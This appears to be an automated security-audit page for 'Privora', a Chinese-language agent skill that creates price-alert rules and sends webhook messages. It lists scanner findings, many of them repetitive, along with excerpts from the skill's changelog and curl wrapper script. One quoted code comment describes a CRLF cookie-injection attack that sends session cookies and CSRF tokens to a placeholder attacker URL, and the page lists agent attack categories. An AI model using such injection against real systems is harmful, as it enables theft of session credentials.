Back to skill

Security audit

Privora · 实时监控 · 黄金实时监控 / 基金净值监控 / 股价预警 · 越线飞书/微信 Webhook · AI Agent

Security checks for vulnerabilities and agentic risk

Overview

This skill is a disclosed Privora alerting workflow that uses a bearer token to create and test webhook-based monitoring rules, with the sensitive parts aligned to that purpose.

Install only if you intend to let an agent use a Privora realtime-alerting token to create and manage alert rules and send real webhook test messages. Use the narrowest token scopes available, keep the token private, verify webhook destinations before testing, and remember that enabled alert rules persist on Privora until you snooze or toggle them off.

Vulnerability Patterns
  • Skill Instruction HijackingAlters the agent's session goals or safety constraints when the skill loads
  • Agent Memory PoisoningWrites attacker-controlled rules into memory that affect later sessions
  • Remote Payload Retrieval and ExecutionFetches external code whose behavior can change after review
  • Embedded Malicious CodeShips malicious scripts inside the skill and executes them locally
  • Unauthorized Access and Privilege EscalationObtains permissions beyond the task's legitimate needs
Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Tool MisuseTool Parameter Abuse, Chaining Abuse, Unsafe Defaults
  • MCP Least PrivilegeUnderdeclared Capability, Wildcard Permission, Missing Permission Declaration
  • MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
Findings (26)

Tool Parameter Abuse

High
Category
Tool Misuse
Confidence
60% confidence
Finding

Tool parameters are crafted to achieve unintended or unsafe behavior. Parameter abuse can bypass intended safety checks (e.g. shell=True, --force, dangerous glob patterns).

Content

Scanner excerpt · CHANGELOG.md (reported line 37)May include surrounding context.

md
Express connection.** Escaping for the config stream roughly doubles a
  quote-dense JSON body's size, so bodies above ~77KB can produce a config
  line over the new 102,400-byte local ceiling this release adds. On a host
  running curl 7.81–8.1.x (e.g. Ubuntu 22.04, Debian 12) that ceiling is
  curl's own real `MAX_CONFIG_LINE_LENGTH`; curl 8.2.0 (2023-07) onward
  raised that internal ceiling to 10 MiB, so on a newer curl this specific
  number is this wrapper's OWN conservative, version-independent choice

Tp2

High
Category
MCP Tool Poisoning
Confidence
85% confidence
Finding

Mixing characters from multiple Unicode scripts in a single identifier is a common technique to create visually ambiguous tool names.

Content

No source excerpt is available for this finding.

Tp4

High
Category
MCP Tool Poisoning
Confidence
98% confidence
Finding

The description presents a narrowly scoped alerting skill, but the content reveals a generic authenticated gateway pattern using a shell wrapper to execute arbitrary agent skills by skillId against a bearer-token-protected endpoint. This mismatch is dangerous because reviewers and operators may grant trust, tokens, or network access assuming limited functionality, while the actual mechanism can invoke a much broader set of backend actions if client-side controls are bypassed or edited.

Content

No source excerpt is available for this finding.

Ae1

High
Category
analysis-evasion
Confidence
100% confidence
Finding

Referenced artifact was not completely inspected

Content

Scanner excerpt · SKILL.md (reported line 122)May include surrounding context.

md
scripts/lg_agent_exec.sh dataasset.list

Ae1

High
Category
analysis-evasion
Confidence
100% confidence
Finding

Referenced artifact was not completely inspected

Content

Scanner excerpt · SKILL.md (reported line 132)May include surrounding context.

md
scripts/lg_agent_exec.sh dataasset.list

Ae1

High
Category
analysis-evasion
Confidence
100% confidence
Finding

Referenced artifact was not completely inspected

Content

Scanner excerpt · SKILL.md (reported line 140)May include surrounding context.

md
scripts/lg_agent_exec.sh dataasset.list

Ae1

High
Category
analysis-evasion
Confidence
100% confidence
Finding

Referenced artifact was not completely inspected

Content

Scanner excerpt · SKILL.md (reported line 146)May include surrounding context.

md
scripts/lg_agent_exec.sh dataasset.list

Ae1

High
Category
analysis-evasion
Confidence
100% confidence
Finding

Referenced artifact was not completely inspected

Content

Scanner excerpt · SKILL.md (reported line 156)May include surrounding context.

md
scripts/lg_agent_exec.sh dataasset.list

Ae1

High
Category
analysis-evasion
Confidence
100% confidence
Finding

Referenced artifact was not completely inspected

Content

Scanner excerpt · SKILL.md (reported line 166)May include surrounding context.

md
scripts/lg_agent_exec.sh dataasset.list

Ae1

High
Category
analysis-evasion
Confidence
100% confidence
Finding

Referenced artifact was not completely inspected

Content

Scanner excerpt · SKILL.md (reported line 180)May include surrounding context.

md
scripts/lg_agent_exec.sh dataasset.list

Ae1

High
Category
analysis-evasion
Confidence
100% confidence
Finding

Referenced artifact was not completely inspected

Content

Scanner excerpt · SKILL.md (reported line 204)May include surrounding context.

md
scripts/lg_agent_exec.sh dataasset.list

Ae1

High
Category
analysis-evasion
Confidence
100% confidence
Finding

Referenced artifact was not completely inspected

Content

Scanner excerpt · SKILL.md (reported line 216)May include surrounding context.

md
scripts/lg_agent_exec.sh dataasset.list

Ae1

High
Category
analysis-evasion
Confidence
100% confidence
Finding

Referenced artifact was not completely inspected

Content

Scanner excerpt · SKILL.md (reported line 226)May include surrounding context.

md
scripts/lg_agent_exec.sh dataasset.list

Ae1

High
Category
analysis-evasion
Confidence
100% confidence
Finding

Referenced artifact was not completely inspected

Content

Scanner excerpt · SKILL.md (reported line 240)May include surrounding context.

md
scripts/lg_agent_exec.sh dataasset.list

Ae1

High
Category
analysis-evasion
Confidence
100% confidence
Finding

Referenced artifact was not completely inspected

Content

Scanner excerpt · SKILL.md (reported line 250)May include surrounding context.

md
scripts/lg_agent_exec.sh dataasset.list

Ae1

High
Category
analysis-evasion
Confidence
100% confidence
Finding

Referenced artifact was not completely inspected

Content

Scanner excerpt · SKILL.md (reported line 251)May include surrounding context.

md
scripts/lg_agent_exec.sh dataasset.list

Ae1

High
Category
analysis-evasion
Confidence
100% confidence
Finding

Referenced artifact was not completely inspected

Content

Scanner excerpt · SKILL.md (reported line 347)May include surrounding context.

md
scripts/lg_agent_exec.sh dataasset.list

Tool Parameter Abuse

High
Category
Tool Misuse
Confidence
70% confidence
Finding

Tool parameters are crafted to achieve unintended or unsafe behavior. Parameter abuse can bypass intended safety checks (e.g. shell=True, --force, dangerous glob patterns).

Content

Scanner excerpt · scripts/lg_agent_exec.sh (reported line 248)May include surrounding context.

sh
#   - a cookie value containing CRLF + `header = "X-Injected: pwned"` gets
#     that header ACTUALLY INJECTED into the real request;
#   - a cookie value containing CRLF + `url = "http://attacker/evil"`
#     makes curl issue a SECOND request to that attacker-chosen URL,
#     carrying the real Cookie and X-CSRF-Token -- session credential
#     exfiltration to an address the attacker picked, not this script's
#     caller.

Tool Parameter Abuse

High
Category
Tool Misuse
Confidence
70% confidence
Finding

Tool parameters are crafted to achieve unintended or unsafe behavior. Parameter abuse can bypass intended safety checks (e.g. shell=True, --force, dangerous glob patterns).

Content

Scanner excerpt · scripts/lg_agent_exec.sh (reported line 368)May include surrounding context.

sh
# ── Body-in-config-stream transport (#1411, design doc
# docs/plans/2026-09-16-body-inside-the-config-stream.md) ───────────────────
# The request body used to reach curl via a temp file (--data-binary
# "@file") to sidestep the MSYS2/curl.exe argv-reencoding bug (non-ASCII
# bytes in a command-line argument get silently corrupted before curl ever
# sees them). That temp file is what ClawHub's scanner flagged as

Tool Parameter Abuse

High
Category
Tool Misuse
Confidence
70% confidence
Finding

Tool parameters are crafted to achieve unintended or unsafe behavior. Parameter abuse can bypass intended safety checks (e.g. shell=True, --force, dangerous glob patterns).

Content

Scanner excerpt · scripts/lg_agent_exec.sh (reported line 501)May include surrounding context.

sh
# argv. Reading another process's argv on the same host (Linux
  # /proc/*/cmdline; a Windows process listing) needs no elevation and no
  # write capability at all. Piping `header = "Authorization: Bearer ..."`
  # into `curl -K -` keeps the token out of argv entirely -- it travels over
  # the pipe as bytes curl reads on its OWN stdin as configuration, never as
  # a command-line argument.
  # `Content-Type` / `Accept` are placed in this SAME config stream (not as

Tool Parameter Abuse

High
Category
Tool Misuse
Confidence
70% confidence
Finding

Tool parameters are crafted to achieve unintended or unsafe behavior. Parameter abuse can bypass intended safety checks (e.g. shell=True, --force, dangerous glob patterns).

Content

Scanner excerpt · scripts/lg_agent_exec.sh (reported line 523)May include surrounding context.

sh
printf 'header = "Content-Type: application/json"\n'
    printf 'header = "Accept: application/json"\n'
    printf 'data-binary = "%s"\n' "$body_esc"
  } | curl -sS -K - -X POST "${BASE_URL}/agent/skills/execute"
}

# ── Optional allowlist gate ─────────────────────────────────────────────────

External Transmission

Medium
Category
Data Exfiltration
Confidence
60% confidence
Finding

Data is being sent to an external URL. This could be legitimate telemetry or data exfiltration. Manual review is recommended.

Content

Scanner excerpt · CHANGELOG.md (reported line 37)May include surrounding context.

md
Express connection.** Escaping for the config stream roughly doubles a
  quote-dense JSON body's size, so bodies above ~77KB can produce a config
  line over the new 102,400-byte local ceiling this release adds. On a host
  running curl 7.81–8.1.x (e.g. Ubuntu 22.04, Debian 12) that ceiling is
  curl's own real `MAX_CONFIG_LINE_LENGTH`; curl 8.2.0 (2023-07) onward
  raised that internal ceiling to 10 MiB, so on a newer curl this specific
  number is this wrapper's OWN conservative, version-independent choice

Undeclared Tool Scope

Medium
Category
MCP Least Privilege
Confidence
88% confidence
Finding

The skill declares shell capability in metadata but does not define an explicit tool scope such as permissions or allowed-tools. That creates ambiguity about what local execution is intended and can allow broader-than-expected command execution by the host agent runtime, especially because the document repeatedly instructs use of a shell wrapper script to invoke authenticated operations.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
91% confidence
Finding

The skill name, title, keywords, and all operational guidance are presented in Chinese, and the examples/instructions assume Chinese-language interaction. There is no indication that users may choose another language or that the Chinese-only presentation is a justified regional compliance requirement, which makes this a natural-language locale policy issue.

Content

No source excerpt is available for this finding.

External Transmission

Medium
Category
Data Exfiltration
Confidence
70% confidence
Finding

Data is being sent to an external URL. This could be legitimate telemetry or data exfiltration. Manual review is recommended.

Content

Scanner excerpt · scripts/lg_agent_exec.sh (reported line 368)May include surrounding context.

sh
# ── Body-in-config-stream transport (#1411, design doc
# docs/plans/2026-09-16-body-inside-the-config-stream.md) ───────────────────
# The request body used to reach curl via a temp file (--data-binary
# "@file") to sidestep the MSYS2/curl.exe argv-reencoding bug (non-ASCII
# bytes in a command-line argument get silently corrupted before curl ever
# sees them). That temp file is what ClawHub's scanner flagged as

Static analysis

No suspicious patterns detected.